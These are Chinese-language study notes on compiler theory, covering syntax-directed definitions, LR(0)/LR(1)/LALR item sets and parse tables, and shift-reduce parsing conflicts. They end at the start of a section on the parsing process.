    • 用于判断输入在语法上的正确性。
    • 语法分析完成后,通常还需将输入的源代码翻译为目标表示形式。
  2. 语法制导定义(Syntax-Directed Definition, SDD)

    • 将文法符号和某些属性相关联
    • 通过语义规则描述如何计算属性的值
  3. 语法制导翻译(Syntax-Directed Translation,SDT)

    在产生式体中加入语义动作,并在适当的时候执行这些语义动作

    • 编译器在分析过程中执行的工作
    • 包含语义分析和正确性检查,若正确,则翻译为中间代码或目标代码
    • 文法符号的属性描述其语义(如变量的类型、层次、存储地址等),通过对属性值的计算完成翻译任务

语法制导定义(SDD)

SDD 是上下文无关文法和属性 / 规则的结合。

规则定义: 对于 $\forall A \rightarrow X_1 X_2 \ldots X_n \in P$,每个规则的一般形式为:$c = f(c_1, c_2, \ldots, c_k)$

  • 综合属性: $c$ 是 $A$ 的一个属性,且 $c_1, c_2, \ldots, c_k$ 是 $A$ 的继承属性或是某个 $X_i$ 的属性(向上看继承的或者向下看子节点属性,综合全局看,通常自下而上进行传递)。
  • 继承属性: $c$ 是某个符号 $X_i$ 的属性,且 $c_1, c_2, \ldots, c_k$ 是 $A$ 或 $X_j$ 的属性(父节点、自己、兄弟节点的属性,向上看,通常自上而下或横向进行传递)。

不允许 $N$ 的继承属性通过 $N$ 的子结点上的属性来定义,但允许 $N$ 的综合属性依赖于 $N$ 本身的继承属性。

终结符号有综合属性(由词法分析器 lexer 获得),但是没有继承属性(它们的属性在词法分析阶段已经完全确定,不依赖于语法树中其他节点的属性)。

S 属性的 SDD

定义只包含综合属性 的 SDD 称为 S 属性的 SDD。

  • 每个语义规则都根据产生式体中的属性值来计算头部非终结符号的属性值
  • 如果我们可以给各个属性值排出计算顺序,那么注释分析树就可以计算得到属性值
  • S 属性的 SDD 一定可以按照 自底向上 的方式求值

S 属性:Synthesized Attributes。

实现:

  • S 属性的 SDD 可以和 LR 语法分析器(从左到右扫描,进行最右推导的逆操作,即从左边开始规约)一起实现
  • 栈中的状态可以附加相应的属性值
  • 在进行归约时,按照语义规则计算归约得到的符号的属性值(下一章会有实例)

无副作用:语义规则不应有复杂的副作用。

  • 受控副作用:在 SDD 中添加除求值之外的动作
  • 无副作用:要求副作用不影响其它属性的求值
  • 没有副作用的 SDD 称为 属性文法(attribute grammar)

适用于自顶向下分析的 SDD

若存在直接左递归,则无法使用自顶向下分析。

消除左递归后,可能无法直接使用自顶向下分析,比如,我们把一个:

$$ T \rightarrow T + E \mid E $$

拆成了:

$$ \begin{aligned} T &\rightarrow E T' \ T' &\rightarrow + E T' \mid \varepsilon \end{aligned} $$

此时,对于第二个产生式,$+$ 的左侧因子无法直接获得。

为此,我们需要引入继承属性。

$$ \begin{array}{|l|l|} \hline \text{产生式} & \text{语义规则} \ \hline T \rightarrow FT' & T'.\text{inh} = F.\text{val} \ & T.\text{val} = T'.\text{syn} \ \hline T' \rightarrow *FT_1' & T_1'.\text{inh} = T'.\text{inh} * F.\text{val} \ & T'.\text{syn} = T_1'.\text{syn} \ \hline T' \rightarrow \varepsilon & T'.\text{syn} = T'.\text{inh} \ \hline F \rightarrow digit & F.\text{val} = digit.\text{lexval} \ \hline \end{array} $$

image-20241117232452765

注意看黑实线的属性传递流,同一个产生式的语义动作可能不是同时执行的。

这些黑实线实际上构成了一个依赖图(后面会讲)。

L 属性的 SDD

定义:语义规则中的每个属性可以是:

  • 综合属性

  • 继承属性,且对于任意产生式 $A \rightarrow X_1 X_2 ... X_n \in P$,$X_j$ 的继承属性仅依赖于:

    • 产生式中 $X_j$ 左边 符号 $X_1, X_2, ..., X_{j-1}$ 的属性
  • $A$ 的继承属性

每一个 S 属性的 SDD 都是 L 属性的 SDD。

L 属性:Left-Attributed Definitions。

L 属性 SDD 的自顶向下语法分析

L 属性的 SDD 可用于按 深度优先 顺序来计算。

对于规则:

$$ A \rightarrow X_1 X_2 ... X_n $$

在递归子程序中实现 L 属性,则对于每个非终结符号 $A$ 或者 $X_i$,其对应的函数的参数为继承属性,返回值为综合属性。

在处理规则时:

  • 在调用 $X_i()$ 之前计算 $X_i$ 的继承属性值,然后以它们为参数调用 $X_i()$,得到 $X_i$ 的综合属性值
  • 在产生式对应代码的最后计算 $A$ 的综合属性值

注意: 如果所有的文法符号的属性计算按上述方式进行,计算顺序必然和依赖关系一致。

依赖图

使用 依赖图 表示计算顺序:

  • 结点:属性值
  • 有向边:属性依赖关系

若依赖图无环,则存在一个拓扑排序,确定属性值的计算顺序。

特定类型的 SDD 一定不包含环,且有固定的排序模式:

  • S 属性的 SDD:可用于 自顶向下自底向上 的语法分析
    • 每个属性都是综合属性
    • 都是根据子构造的属性计算出父构造的属性
    • 在依赖图中,总是通过子结点的属性值来计算父结点的属性值
  • L 属性的 SDD:可用于按 深度优先 顺序来计算

依赖图的边

  • 综合属性:从下到上
  • 继承属性:从左到右,从上到下

💾

语法分析 IV

2024年11月10日 22:07

LR (1) 文法

LR (k) 项

形式:$[A \rightarrow \alpha \cdot \beta, a_1a_2 \ldots a_k]$

  • 当 $\beta \neq \varepsilon$ 时,为移进或待归约项,$a_1a_2 \ldots a_k$ 不直接起作用
  • 当 $\beta = \varepsilon$ 时,即为归约项 $[A \rightarrow \alpha \cdot, a_1a_2 \ldots a_k]$,仅当前输入符串前 $k$ 个符号是 $a_1a_2 \ldots a_k$ 时,才能用 $A \rightarrow \alpha$ 进行归约
  • $a_1a_2 \ldots a_k$ 称为向前搜索符号串(展望项)

LR (1) 有效项

LR (1) 项 $[A \rightarrow \alpha \cdot \beta, a]$ 对于一个可行前缀 $\gamma$ 有效的条件是存在一个推导:

$$ S \Rightarrow_{rm}^* \delta Aw \Rightarrow_{rm}\underbrace{\delta \alpha}_{\gamma} \beta w $$

其中:

  1. $\gamma = \delta \alpha$
  2. 要么 $a$ 是 $w$ 的第一个符号,要么 $w$ 为 $\varepsilon$ 且 $a$ 等于 $$ $ $$

考虑文法 $G:S \rightarrow CC \quad C \rightarrow cC \mid d$

规范推导:

$$ S \Rightarrow_{rm}^* ccCcd \Rightarrow_{rm} cccCcd $$

项 $[C \rightarrow c \cdot C, c]$ 对可行前缀 $ccc$ 是有效的。

LR (1) 有效项的推导

若项 $[A \rightarrow \alpha \cdot B \beta, a]$ 对可行前缀 $\gamma = \delta \alpha$ 是有效的,则存在一个规范推导:

$$ S \Rightarrow_{rm}^* \delta Aax \Rightarrow_{rm} \delta \alpha B \beta ax $$

假定 $\beta ax \Rightarrow_{rm}^* by$,则对每一个形如 $B \rightarrow \xi$ 的产生式,有规范推导:

$$ S \Rightarrow_{rm}^* \delta \alpha B \beta ax \Rightarrow_{rm}^* \delta \alpha Bby \Rightarrow_{rm} \delta \alpha \xi by $$

从而项 $[B \rightarrow \cdot \xi, b]$ 对于可行前缀 $\gamma = \delta \alpha$ 也是有效的。

注意到 $b$ 必然属于二者之一:

  1. 从 $\beta$ 推出的第一个终结符号
  2. $\beta \Rightarrow_{rm}^* \varepsilon$ 而 $b = a$

这两种可能性结合在一起,则 $b \in \text{First}(\beta a)$。

LR (1) 项集的构造

构造有效 LR (1) 项集族的方法实质上和构造规范 LR (0) 项集族的方法相同。

我们只需要修改两个过程:Closure 和 Goto。

Closure

设 $I$ 是 $G$ 的一个 LR (1) 项集,$\text{Closure}(I)$ 是从 $I$ 出发用以下三条规则构造的项集:

  1. 每一个 $I$ 中的项都属于 $\text{Closure}(I)$
  2. 若项 $[A \rightarrow \alpha \cdot B \beta, a]$ 属于 $\text{Closure}(I)$ 且 $B \rightarrow \gamma \in P$,则对任何 $b \in \text{First}(\beta a)$,把 $[B \rightarrow \cdot \gamma, b]$ 加到 $\text{Closure}(I)$ 中
  3. 重复执行 (2) 直到 $\text{Closure}(I)$ 不再增大为止

Goto

设 $I$ 是 $G$ 的一个 LR (1) 项集,$X$ 是一个文法符号,定义:

$$ \text{Goto}(I, X) = \text{Closure}(J) $$

其中 $J = {[A \rightarrow \alpha X \cdot \beta, a] \mid [A \rightarrow \alpha \cdot X \beta, a] \in I}$

LR (1) 项集族的构造方法

输入:一个增广文法 $G'$。

输出:LR (1) 项集族,其中的每个项集对文法 $G'$ 的一个或多个可行前缀有效。

方法:过程 Closure 和 Goto,以及用于构造项集的主例程 items

过程 Closure

$$ \begin{aligned} &\text{SetOfItems } \textbf{Closure}(I) { \ &\quad \text{repeat} \ &\quad \quad \text{for (} [A \to \alpha \cdot B \beta, a] \in I \text{)} \ &\quad \quad \quad \text{for (} B \to \gamma \in G' \text{)} \ &\quad \quad \quad \quad \text{for (} b \in \text{First}(\beta a) \text{)} \ &\quad \quad \quad \quad \quad \text{将 } [B \to \cdot \gamma, b] \text{ 加入 } I \text{ 中;} \ &\quad \text{until 不能向 } I \text{ 中加入更多的项;} \ &\quad \text{return } I; \ &} \end{aligned} $$

过程 Goto

$$ \begin{aligned} &\text{SetOfItems } \textbf{Goto}(I, X) { \ &\quad J \leftarrow \varnothing; \ &\quad \text{for (} [A \to \alpha \cdot X \beta, a] \in I \text{)} \ &\quad \quad \text{将 } [A \to \alpha X \cdot \beta, a] \text{ 加入 } J \text{ 中;} \ &\quad \text{return } \textbf{Closure}(J); \ &} \end{aligned} $$

最后执行 $\text{Closure}$ 的原因是,$\text{Goto}$ 函数返回的是一个新的项集,需要对其进行闭包操作。

项集族 $C$

$$ \begin{aligned} &\text{void } \textbf{items}(G') { \ &\quad C \leftarrow { \textbf{Closure}({ [S' \to \cdot S, $] }) }; \ &\quad \text{repeat} \ &\quad \quad \text{for (每个项集 } I \in C \text{)} \ &\quad \quad \quad \text{for (每个文法符号 } X \text{)} \ &\quad \quad \quad \quad \text{if (} \textbf{Goto}(I, X) \neq \varnothing \text{ 且不在 } C \text{ 中)} \ &\quad \quad \quad \quad \quad \text{将 } \textbf{Goto}(I, X) \text{ 加入 } C \text{ 中;} \ &\quad \text{until 不再有新的项集加入到 } C \text{ 中;} \ &} \end{aligned} $$

构造 LR (1) 分析表

  1. DFA 状态对应分析表行

    DFA 中的每个状态对应分析表中的一行。

  2. DFA 状态转移

    对于 DFA 中的每一个从状态 $i$ 到状态 $j$ 的转移:

    • 如果转移符号为终结符 $a$:在表项 $M[i, a]$ 中填写 移进动作 $S_j$ (Shift,Action 列)
    • 如果转移符号为非终结符 $A$:在表项 $M[i, A]$ 中填写 转移到状态 $j$ (Goto 列)
  3. 包含归约项 $[A \rightarrow \alpha \cdot, a]$ 的状态 $i$

    在表项 $M[i, a]$ 中填写归约动作 $r_k$(Reduce),其中 $k$ 是产生式 $A \rightarrow \alpha$ 的编号

注意:如果每个单元格中只包含一个动作,则分析表合法

LR(1)分析表举例

文法:

$$ \begin{aligned} & \quad S' \rightarrow S \ & \quad S \rightarrow CC \ & \quad C \rightarrow cC \ & \quad C \rightarrow d \ \end{aligned} $$

项集族:

image-20241114185322182

分析表:

image-20241114185347887

LALR 文法

LALR:Look-Ahead LR

LR (1) 分析表:状态多,实际使用较少。

同心集:两个 LR (1) 项集 去掉搜索符后相同,称为 同心

LALR (1) 分析表:合并同心集(合并搜索符串)后构造出的 LR 分析表。

合并同心项集不会产生移进 / 归约冲突,但是有可能产生归约 / 归约冲突

因为合并的时候合并的是同心项的展望符,而展望符只在规约的时候起作用,在移入的时候是不起作用的,只要合并前各个同心项目集本身是没有移进 / 归约冲突的,就不会有移进 / 归约冲突(后文有证明)。

LALR 分析表的高效构造算法

通过先构造 LR (1) 分析表再合并得到 LALR (1) 分析表的过程太慢了。

  1. 内核项表示

    使用内核项表示 LR (0) 或 LR (1) 项集。

    内核项:$[S' \rightarrow \cdot S]$ 或 $$[S' \rightarrow \cdot S, $]$$,以及 $\cdot$ 不在最左边的项(这些项代表对于已经读入的符号完全没有要求)。

  2. 传播和自发生成

    通过传播和自发生成,获得向前看符号,得到 LALR (1) 内核项。

    传播 / 自发生成:向前看符号的传递过程。

    对于某个项 $[A \rightarrow \alpha \cdot B \beta, a]$ 执行闭包:

    传播:假设向前看符号是一个不在文法中的符号 $#$,即对 $[A \rightarrow \alpha \cdot B \beta, #]$ 进行闭包,若得到的某些项的向前看符号 就是 $#$,那么就认为这些项的向前看符号是传播得到的,直接复制 $a$,就行;

    自发生成:假设向前看符号是一个不在文法中的符号 $#$,即对 $[A \rightarrow \alpha \cdot B \beta, #]$ 进行闭包,若有些项的向前看符号 不是 $#$,那么就认为这些项的向前看符号是传播得到的,不改动这些项的向前看符号;

  3. Closure 函数

    使用 $\text{Closure}$ 函数求出内核项的闭包,得到 LALR 分析表。

由于传播和自发生成的表述比较抽象,这里给一个例子(书 P175)来自己悟:

文法:

$$ \begin{aligned} S' &\to S \ S &\to L = R \mid R \ L &\to * R \mid id \ R &\to L \end{aligned} $$

直接根据产生式,构建出只有内核项的项集族: $$ \begin{aligned} I_0 &: {S' \to \cdot S} \ I_1 &: {S' \to S\cdot} \ I_2 &: {S \to L\cdot = R, R \to L\cdot} \ I_3 &: {S \to R\cdot} \ I_4 &: {L \to * \cdot R} \ I_5 &: {L \to id\cdot} \ I_6 &: {S \to L = \cdot R} \ I_7 &: {L \to * R\cdot} \ I_8 &: {R \to L\cdot} \ I_9 &: {S \to L = R\cdot} \end{aligned} $$

使用如下算法来确定向前看符号:

输入:一个 LR (0) 项集 $I$ 的内核 $K$ 以及一个文法符号 $X$。$#$ 是一个不在文法中的符号。

输出:由 $I$ 中的项为 $\text{Goto}(I, X)$ 中内核项自生成的向前看符号,以及 $I$ 中将其向前看符号传播到 $\text{Goto}(I, X)$ 中内核项的项。

$$ \begin{aligned} &\text{for } (K \text{中的每个项 } A \to \alpha \cdot \beta) { \ &\quad J := \text{Closure}({[A \to \alpha \cdot \beta, #]}); \ &\quad \text{if } ([B \to \gamma \cdot X \delta, a] \text{ 在 } J \text{ 中,并且 } a \neq #) \ &\quad\quad \text{断定 } \text{Goto}(I, X) \text{中的项 } B \to \gamma X \cdot \delta \text{的向前看符号 } a \text{ 是自发生成的;} \ &\quad \text{if } ([B \to \gamma \cdot X \delta, #] \text{ 在 } J \text{ 中}) \ &\quad\quad \text{断定向前看符号从 } I \text{中的项 } A \to \alpha \cdot \beta \text{ 传播到了 } \text{Goto}(I, X) \text{中的项 } B \to \gamma X \cdot \delta \text{上}; \ & } \ \end{aligned} $$

当我们将算法应用于项集 $I_0$ 的内核时,我们首先计算 $\text{Closure}({[S' \rightarrow \cdot S, #]})$,得到:

$$ \begin{aligned} & S' \rightarrow \cdot S, # \ & S \rightarrow \cdot L = R, # \ & S \rightarrow \cdot R, # \ & L \rightarrow \cdot *R, # / = \ & L \rightarrow \cdot id, # / = \ & R \rightarrow \cdot L, # \end{aligned} $$

在这个闭包的项中,我们看到有两个项中的向前看符号 $=$ 是自发生成的;

而对于这个闭包结果,把 $#$ 替换为真实的闭包前原始项 $$[S' \rightarrow \cdot S, $]$$ 的向前看符号,即 $$ $ $$,我们认为此时的向前看符号 $$ $ $$ 是传播得到的。

LALR (1) 的讨论

  1. 核心依赖性

    由于 $\text{Goto}(I, X)$ 仅依赖于 $I$ 的核心,因此 LALR(1)项集合并后的转换函数 $\text{Goto}(I, X)$ 随自身的合并而得到

  2. 动作修改

    动作 $\text{action}$ 应当进行修改,以反映各被合并集合的既定动作

  3. 归约 - 归约冲突

    项集合合并时,可能会导致冲突。这种冲突不会是移进 - 归约冲突:

    $$ \begin{aligned} I_k: &{[A \rightarrow \alpha \cdot, u_1] \quad [B \rightarrow \beta \cdot ay, b]} \quad a \cap u_1 = \varnothing \ I_j: &{[A \rightarrow \alpha \cdot, u_2] \quad [B \rightarrow \beta \cdot ay, c]} \quad a \cap u_2 = \varnothing \ I_{kj}: &{[A \rightarrow \alpha \cdot, u_1 \cup u_2] \quad [B \rightarrow \beta \cdot ay, b/c]} \quad a \cap (u_1 \cup u_2) = \varnothing \end{aligned} $$

    但可能引起归约 - 归约冲突:

    $$ \begin{aligned} I_k: &{[A \rightarrow \alpha \cdot, u_1] \quad [B \rightarrow \beta \cdot, u_2]}\ I_j: &{[A \rightarrow \alpha \cdot, u_2] \quad [B \rightarrow \beta \cdot, u_1]}\ I_{kj}: &{[A \rightarrow \alpha \cdot, u_1 \cup u_2] \quad [B \rightarrow \beta \cdot, u_1 \cup u_2]} \end{aligned} $$

    此时,有两个展望符号相同、核心也相同的归约项,可能产生归约 - 归约冲突。

二义性文法的使用

  1. 二义性文法不是 LR 的
  2. 有用的二义性文法
    • 简洁描述某些结构
    • 隔离某些语法结构,对其进行特殊处理
  3. 处理某些二义性文法
    • 通过消除二义性规则,保证每个句子只有一棵语法分析树
    • 可以在 LR 分析器中实现这一规则

利用优先级 / 结合性消除冲突

  1. 二义性文法
    • $E \rightarrow E + E \mid E * E \mid (E) \mid \text{id}$
    • 等价于:$E \rightarrow E + T \mid T \quad T \rightarrow T * F \mid F \quad F \rightarrow (E) \mid \text{id}$
  2. 二义性文法的优点
    • 容易:修改算符的优先级和结合性
    • 简洁:多优先级无需引入大量非终结符
    • 高效:不需处理 $ E \rightarrow T $ 这样的归约

四种 LR 解析的对比

  1. 如果构造 LR (0) 的 DFA
    • 没有归约冲突就是 LR (0) 文法
    • 有冲突但可以通过 Follow 集合解决冲突就是 SLR 文法
    • 否则不是 SLR 文法
  2. 如果构造 LR (1) 的 DFA
    • 没有冲突就是 LR (1) 文法
    • 如果合并同心集之后也没有冲突,那么就是 LALR (1) 文法
  3. 包含关系
    • $\text{LR(0)} < \text{SLR} < \text{LALR} < \text{LR(1)}$

用途比较:

  • $\text{LR}(0)$:最简单,但只能用于最简单的文法
  • $\text{SLR}$:构造简单,易于实现,实用价值高(大多数上下文无关文法均可构造 SLR 分析表)
  • $\text{LR}(1)$:适用文法类最大(几乎所有上下文无关文法),但分析表体积过大,使用价值不大
  • $\text{LALR}(1)$:介于 $\text{SLR}$ 和 $\text{LR}(1)$ 之间,最实用(比 $\text{SLR}$ 适用更多,比 $\text{LR}(1)$ 更简单)

💾

语法分析 III

2024年11月10日 22:06

自底向上语法分析

自底向上语法分析:将一个串 $w$ 归约 回到文法开始符号 $S$ 的过程。

在每个归约(reduction)步骤中,一个与某 产生式右部相匹配的特定子串 被替换为该 产生式左部 的非终结符号。

下文中,对如下概念不加区分:

  • 产生式左部 / 产生式头
  • 产生式右部 / 产生式体

归约:是一个推导步骤的反向操作

  • 推导步骤:将句型中的一个非终结符号替换为该符号的某个产生式的体 $A \rightarrow \alpha$
  • 归约步骤:与某产生式体匹配的子串被替换为该产生式头部的非终结符号 $\alpha \leftarrow A$

自底向上语法分析的目标

目标:反向构造一个推导过程。

方法:对输入进行从左到右的扫描,并在扫描过程中进行自底向上语法分析,就可以反向构造出一个最右推导。

句柄(Handle)

句柄:是与某个 产生式体 匹配的 子串,对它的归约代表了相应的最右推导中的一个反向步骤(看接下来的形式定义会好理解一些)。

Ref:

  • 前缀(prefix):移走 $x$ 尾部的 零个 或多个连续的符号。
  • 后缀(suffix):移走 $x$ 头部的 零个 或多个连续的符号。
  • 子串(substring):从 $x$ 中删去一个前缀和一个后缀。

注意,和某个产生式体匹配的最左子串不一定是句柄( 需要归约后能回到开始符号 )。

形式定义

若有 $S {\Rightarrow}^{*}{\text{rm}} \alpha A w \Rightarrow{\text{rm}} \underbrace{\alpha \beta w}_{\gamma}$ ,那么紧跟在 $\alpha$ 之后的 $\beta$ 是 句柄

最右句型:所有在最右推导中出现的句型,其内句柄右边的串 $w$ 只包含终结符号。

将 $\beta$ 替换为 $A$ ( 规约 )之后得到的串($\alpha A w$)是 $\gamma$ 的某个 最右推导序列 中出现在位于 $\gamma$($\alpha \beta w$) 之前的最右句型。

句柄可能存在多个,如果一个文法是 无二义性 的,那么该文法的 每个最右句型都有且只有一个句柄

句柄的寻找方法

给定:

$$ S = \gamma_0 \stackrel{rm}{\Rightarrow} \gamma_1 \stackrel{rm}{\Rightarrow} \gamma_2 \stackrel{rm}{\Rightarrow} \cdots \stackrel{rm}{\Rightarrow} \gamma_{n-1} \stackrel{rm}{\Rightarrow} \gamma_n = w $$

为了以相反顺序重构这个推导,我们在 $\gamma_n$ 中寻找句柄 $\beta_n$,并将 $\beta_n$ 替换为相关产生式 $A \rightarrow \beta_n$ 的头部 $A$,得到前一个最右句型 $\gamma_{n-1}$。

移入 - 归约语法分析技术

移入 - 归约语法分析是一种 自底向上 的语法分析技术,主要操作包括 移入归约

组成

  • :存放已识别的文法符号,句柄通常出现在栈的顶部
  • 输入缓冲区:存放待分析的符号,通常显示在右侧

image-20241114152516345

主要操作

  1. 移入(shift):将下一个输入符号移到栈的顶部
  2. 归约(reduce):将栈顶符号串(右部)替换为相应的产生式左部
  3. 接受(accept):语法分析成功完成
  4. 报错(error):发现语法错误,并调用错误恢复工具

LR ($k$) 中的 $k$ 表示 在输入中向前看 $k$ 个符号

移入 - 归约的语法分析技术可以使用栈中离栈顶很远的信息(向前看符号)来引导语法分析过程。

移入 - 归约语法分析中的冲突

有些上下文无关文法不能使用移入 - 归约语法分析技术。

即使知道了栈中的所有内容以及接下来的 $k$ 个输入符号,我们仍然可能会遇到:

  1. 移入 / 归约冲突:无法判断应该进行移入还是归约操作
  2. 归约 / 归约冲突:无法在多个可能的归约方法中选择正确的归约动作

接下来,我们举例说明。

移入 / 规约冲突举例

定义:在某个状态下,分析器既可以进行移入操作,也可以进行归约操作,但无法确定应该选择哪一种。

考虑以下文法:

  1. $E \rightarrow E + E$
  2. $E \rightarrow id$

假设当前状态是:

  • 栈:$id$
  • 剩余输入:$+ id$

在这种情况下,分析器可以选择:

  1. 移入:将 $+$ 移入栈中
  2. 归约:根据 $E \rightarrow id$,将 $id$ 归约为 $E$

这是一个典型的移入 / 归约冲突,因为分析器无法确定是应该移入 $+$ 还是进行归约。

规约 / 规约冲突举例

定义:在某个状态下,分析器可以进行多种归约操作,但无法确定应当选择哪一种。

考虑以下文法:

  1. $S \rightarrow A$
  2. $S \rightarrow B$
  3. $A \rightarrow a$
  4. $B \rightarrow a$

假设当前状态是:

  • 栈:$a$
  • 剩余输入:空

在这种情况下,分析器可以选择:

  1. 根据 $A \rightarrow a$ 进行归约。
  2. 根据 $B \rightarrow a$ 进行归约。

这是一个归约 / 归约冲突,因为分析器无法确定是应该将 $a$ 归约为 $A$ 还是 $B$。

LR ($k$) 语法分析

LR ($k$) 语法分析的定义:

  • L 表示对输入进行从左到右的扫描
  • R 表示反向构造出一个最右推导序列
  • $k$ 表示在做出语法分析决策时向前看 $k$ 个输入符号(用于指导规约操作)

对于实际应用,$k = 0$ 和 $k = 1$ 具有重要意义,因此这里只考虑 $k \leq 1$ 的情况。当省略 $k$ 时,假设 $k = 1$。

LR (0) 项和 LR (0) 自动机

LR (0) 项

:一些状态,这些状态表示了语法分析过程中所处的位置。

一个文法 $G$ 的一个 LR (0) 项 是 $G$ 的一个产生式再加上一个位于它的右侧某处的点。

举例:$A \rightarrow XYZ$:

  • $A \rightarrow \cdot XYZ$
  • $A \rightarrow X \cdot YZ$
  • $A \rightarrow XY \cdot Z$
  • $A \rightarrow XYZ \cdot$

这里,$\cdot$ 标记了当前读到的位置,$\cdot$ 左边是已经读到的,$\cdot$ 右边是尚未读到的。

项表明了语法分析过程的给定点,我们已经看到一个产生式的哪些部分。

比如,$A \rightarrow X \cdot YZ$ 表明当前已经读到了 $X$,期望接下来在输入中看到一个从 $YZ$ 推导得到的串(从而可以规约回 $YZ$,再读入 $YZ$ 后即可规约回 $A$)。

LR (0) 项可分为四类:

  1. 移进项:$A \to \alpha \cdot a \beta, \quad a \in V_T$,表示当前可以读取符号 $a$ 并进行移入操作
  2. 待归约项:$A \to \alpha \cdot B \beta, \quad B \in V_N$,表示当前需要继续其他操作后(至少还要把 $B$ 给规约出来),才可以归约到 $A$
  3. 归约项:$A \to \alpha \cdot$,表示当前可以进行规约操作(已经把一个产生式体完全读入了),即将 $\alpha$ 规约为 $A$
  4. 接受项:$S' \to S \cdot$

对于产生式 $A \to \varepsilon$ 的唯一一项是 $A \to \cdot$,它是归约项。

项集:这些项的列表

我们还可以划分每个项为如下两类:

  1. 内核项:包括初始项 $S' \rightarrow \cdot S$ 以及点不在最左端的所有项(代表要么正在从头开始,要么已经有一些已读信息了)
  2. 非内核项:除了 $S' \rightarrow \cdot S$ 之外点在最左端的所有项(代表我们对于这个产生式完全没有任何已读信息)

规范 LR (0) 项集族的构造

为了构造一个文法的规范 LR (0) 项集族,我们定义了一个 增广文法 (augmented grammar)和两个函数:ClosureGoto

增广文法

如果 $G$ 是一个以 $S$ 为开始符号的文法,那么 $G$ 的增广文法 $G'$ 就是在 $G$ 中加上新开始符号 $S'$ 和产生式 $S' \rightarrow S$ 而得到的文法。

当且仅当语法分析器要使用规则 $S' \rightarrow S$ 进行归约时(即 $S' \rightarrow S \cdot$),输入符号串被接受(即表明已经完全规约回到了原开始符号)。

引入这个新的开始产生式的目的是使得文法开始符号($S'$)仅出现在一个产生式的左边,从而使得分析器只有一个接受状态

项集的闭包

如果 $I$ 是文法 $G$ 的一个项集,那么 $\text{Closure}(I)$ 就是根据下面的两个规则从 $I$ 构造得到的项集:

  1. 一开始,将 $I$ 中的各个项加入到 $\text{Closure}(I)$ 中
  2. 如果 $A \rightarrow \alpha \cdot B \beta$ 在 $\text{Closure}(I)$ 中,$B \rightarrow \gamma$ 是一个产生式,并且项 $B \rightarrow \cdot \gamma$ 不在 $\text{Closure}(I)$ 中,就将这个项加入其中。不断应用这个规则,直到没有新项可以加入到 $\text{Closure}(I)$ 为止

直观地讲,$\text{Closure}(I)$ 中的项 $A \rightarrow \alpha \cdot B \beta$ 表明在语法分析过程的某点上,我们认为接下来可能会在输入串中看到一个能够从 $B \beta$ 推导得到的子串。

这个可以从 $B \beta$ 推导得到的子串的某个前缀肯定可以从 $B$ 推导得到,而推导 / 逆向规约时必然要用某个 $B$ 产生式。

因此我们加入了各个 $B$ 产生式对应的项。也就是说,如果 $B \rightarrow \gamma$ 是一个产生式,那么我们把 $B \rightarrow \cdot \gamma$ 加入到 $\text{Closure}(I)$ 中。

Goto 函数

$\text{Goto}$ 函数形式为 $\text{Goto}(I, X)$,其中:

  • $I$ 是一个项集
  • $X$ 是一个文法符号

$\text{Goto}(I, X)$ 被定义为 $I$ 中所有形如 $[A \rightarrow \alpha \cdot X \beta]$ 的项所对应的项 $[A \rightarrow \alpha X \cdot \beta]$ 的集合的闭包,即:

$$\text{Goto}(I, X) = \text{Closure}({ [A \rightarrow \alpha X \cdot \beta] \mid [A \rightarrow \alpha \cdot X \beta] \in I })$$

直观地讲,$\text{Goto}$ 函数用于定义一个文法的 LR (0) 自动机中的移入单个符号( 终结符号或者非终结符号都可以 )的步骤,也即一类 状态转换

求 LR (0) 项集规范族的算法

$$ \begin{aligned} &\text{void } items(G') { \ &\quad C = \textbf{Closure}({[S' \to \cdot S]}); \ &\quad \text{repeat} \ &\quad \quad \text{for (}C \text{ 中每个项集 } I \text{)} \ &\quad \quad \quad \text{for (每个文法符号 } X \text{)} \ &\quad \quad \quad \quad \text{if (} Goto(I, X) \text{ 非空且不在 } C \text{ 中)} \ &\quad \quad \quad \quad \quad 将 Goto(I, X) 加入 C 中; \ &\quad \text{until 在某一轮中没有新的项集被加入到 } C \text{ 中;} \ &} \end{aligned} $$

从初始项集开始,不断计算各种可能的后继,直到生成所有的项集。

LR (0) 自动机的构造

  1. 规范 LR (0) 项集族中的项集可以作为 LR (0) 自动机的状态

  2. $\text{Goto}(I, X) = J$,则从 $I$ 到 $J$ 有一个标号为 $X$ 的转换

  3. 初始状态为 $\text{Closure}({ S' \rightarrow \cdot S })$ 对应的项集

  4. 接受状态:包含形如 $A \rightarrow \alpha \cdot$ 的项集对应的状态,即任何表示识别出了一个句柄的状态都是这个自动机的终态

    可以发现所有的终态都是规约动作,说明 LR 事实上就是一直规约句柄的过程

    对于整个 LR (0) 的编译过程而言,$S'\to S \cdot$ 当然是表示编译完成的终态

    但是 LR (0) 自动机只是我们构造 LR (0) 分析表的中间步骤

    要手动填 Action 和 Goto 表之后才构成整个 LR (0) 分析流程

移入 - 归约决策过程

假设文法符号串 $\gamma$ 使 LR (0) 自动机从开始状态运行到状态 (项集) $j$:

  1. 归约判断:如果 $j$ 中有一个形如 $A \rightarrow \alpha \cdot$ 的项,那么:
    • 在 $\gamma$ 之后添加一些 终结符号 可以得到一个最右句型
    • $\alpha$ 是 $\gamma$ 的后缀,且 $A \rightarrow \alpha$ 是这个句型的句柄
    • 表示 可能 找到了当前最右句型的句柄
  2. 移入判断:如果 $j$ 中存在一个项 $B \rightarrow \alpha \cdot X \beta$,那么:
    • 在 $\gamma$ 之后 添加 $X \beta$,然后再添加一个终结符号串 可以得到一个最右句型
    • 在这个句型中 $B \rightarrow \alpha X \beta$ 是句柄
    • 此时表示还没有找到句柄,至少还需要移进 $X$

LR 语法分析表

语法分析表由两个部分组成:

  • 一个语法分析动作函数 $\text{Action}$
  • 一个转换函数 $\text{Goto}$

Action 表

$\text{Action}$ 函数有两个参数:

  • 状态 $i$
  • 终结符号 $a$(或者是输入结束标记 $$$ $$)。

$\text{Action}[i, a]$ 的取值可以有下列四种形式:

  1. 移入(Goto) $S_j$:$j$ 表示一个状态,$S_j$ 表示移进(Shift)到 $j$。语法分析器的动作是将输入符号 $a$ 移入栈中,使用状态 $j$ 来代表 $a$
  2. 归约(Reduce) $r_j$:产生式 $j = A \rightarrow \beta$:语法分析器将栈顶的 $\beta$ 根据这个产生式归约为产生式头 $A$
  3. 接受(Accept):语法分析器接受输入并完成语法分析过程
  4. 报错(Error):语法分析器在输入中发现错误并执行某个纠正动作

Goto 表

我们把定义在项集上的 $\text{Goto}$ 函数扩展为定义在状态集上的函数:如果 $\text{Goto}[I_i, A]=I_j$,那么 $\text{Goto}$ 把状态 $i$ 和一个非终结符号 $A$ 映射到状态 $j$。

分析过程

